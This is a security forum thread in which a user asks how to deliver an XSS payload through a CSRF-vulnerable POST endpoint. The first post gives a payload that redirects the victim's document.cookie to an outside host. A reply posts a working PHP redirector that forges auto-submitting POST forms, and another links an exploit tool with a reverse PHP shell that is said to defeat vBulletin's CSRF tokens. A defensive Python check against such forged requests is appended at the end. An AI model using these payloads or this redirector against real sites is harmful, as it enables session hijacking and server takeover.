CSRF with XSS payload encoding help

eyenit0

Jr. Member

Posts: 52

Joined: Wed Sep 01, 2010 2:17 pm

Post Thu Aug 02, 2012 2:13 pm

CSRF with XSS payload encoding help

Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden HTML form that's auto-submitted by JavaScript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multipart/form-data but no luck. The CSRF vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an HTTP POST request with JavaScript to submit it, but I'm not sure how.

Any input is appreciated!
unicityd

Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Thu Aug 02, 2012 2:19 pm

Re: CSRF with XSS payload encoding help

Will any of the URL shortening services accept it?
BS in IT, CISSP, MS in IS Management (in progress)
eyenit0

Jr. Member

Posts: 52

Joined: Wed Sep 01, 2010 2:17 pm

Post Thu Aug 02, 2012 11:32 pm

Re: CSRF with XSS payload encoding help

Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.
unicityd

Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Fri Aug 03, 2012 2:50 am

Re: CSRF with XSS payload encoding help

No; they won't work with POST requests. There are other websites that will submit a POST for you though.

http://tomengineering.tripod.com/gettopost.html
http://get-to-post.nickj.org/
BS in IT, CISSP, MS in IS Management (in progress)
ambient

Newbie

Posts: 20

Joined: Tue Feb 17, 2009 1:33 am

Location: Thailand

Post Wed Nov 07, 2012 2:57 am

Re: CSRF with XSS payload encoding help

You could implement it with the CSRF redirector technique.
I posted it here, but the source code is unavailable.

http://pornsookk.wordpress.com/2011/07/ ... edirector/

  Code:
<html>
<title>PHP CSRF Redirector</title>
<body>
<?php
/*  Call:
 *  http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345
 *  The part before the first '?' is the target URL; the part after it is a
 *  '|'-separated list of key=value pairs, each printed as a hidden field.
 */
$csrf   = $_GET['csrf'];
$tokens = preg_split('/\?/', $csrf);
$url    = $tokens[0];
$vars   = preg_split('/\|/', $tokens[1]);
print('<form name="csrfForm" method="post" action="' . $url . '">');
for ($i = 0; $i < sizeof($vars); $i++) {
    /* $vars[$i] is key=value: key = $terms[0], value = $terms[1] */
    $terms = explode('=', $vars[$i]);
    print('<input type="hidden" name="' . $terms[0] . '" value="' . $terms[1] . '" />');
}
print('</form>');   /* the form is closed here, not again after the script */
?>
<script language="javascript" type="text/javascript">
  document.forms[0].submit();
</script>
</body>
</html>
Last edited by ambient on Wed Nov 07, 2012 4:40 am, edited 1 time in total.
MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Wed Nov 07, 2012 3:49 am

Re: CSRF with XSS payload encoding help

Take a look at: www.intern0t.org/xssor/ for encoding methods.

Take a look at: http://www.exploit-db.com/vbseo-from-xs ... php-shell/ for a real world Proof of Concept (and former 0day).

The actual tool is available via: http://www.exploit-db.com/sploits/evilwebtool.tar.gz where trojan.js contains the JavaScript payload. (Note that the Python tool reads PHP code or the reverse PHP shell (from pentestmonkey) and parses it into the trojan file before serving it.)

It took some clever encoding, but it works 100% (tested in Firefox) and has been used in a few demos that I've made. Knowing JavaScript, HTML and attack vectors within these, including various encoding methods, will be sufficient to pull off any XSS attack, even defeating anti-CSRF tokens.

The trojan.js file bypasses the built-in CSRF protection in vBulletin as well.  ;D It's probably the best PoC that I have ever made hehe
I'm an InterN0T'er
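From the defender's side, the redirector script posted above produces a cross-site POST that carries only attacker-chosen fields and arrives with the attacker page's Origin. The following check (an added example, not code from this thread or from any of the tools linked in it) is what a server such as the hypothetical vulnerable.net would need to reject it: an Origin/Referer comparison plus a per-session synchronizer token compared in constant time. Names, the sample request and the session store are constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the application being protected (hypothetical; taken from the
# example redirector call in the thread).
APP_ORIGIN = "http://vulnerable.net"

def issue_token(session):
    """Mint a per-session synchronizer token and store it server-side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def source_origin(headers):
    """Origin header if present, else the Referer's scheme://host, else None."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    ref = headers.get("Referer")
    if ref:
        p = urlsplit(ref)
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}"
    return None

def csrf_check(method, headers, form, session):
    """Return (ok, reason). A forged cross-site POST like the one the
    redirector builds fails on origin first, then on the missing token."""
    if method.upper() not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"
    if source_origin(headers) != APP_ORIGIN:
        return False, "origin mismatch"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf token"
    return True, "ok"

# Constructed sample: what the target sees when the auto-submitted form from
# hackerhost.net posts username/passwd (no token field, foreign Origin).
FORGED = dict(method="POST",
              headers={"Origin": "http://hackerhost.net", "Host": "vulnerable.net"},
              form={"username": "john", "passwd": "12345"})

if __name__ == "__main__":
    sess = {}
    tok = issue_token(sess)
    print(csrf_check(**FORGED, session=sess))   # (False, 'origin mismatch')
    legit = {"method": "POST", "headers": {"Origin": APP_ORIGIN},
             "form": {"username": "john", "csrf_token": tok}}
    print(csrf_check(**legit, session=sess))    # (True, 'ok')
```

As MaXe notes, none of this helps once script runs on the application's own origin, because same-origin JavaScript can read the token and sends a matching Origin; the XSS itself has to be fixed.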

Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software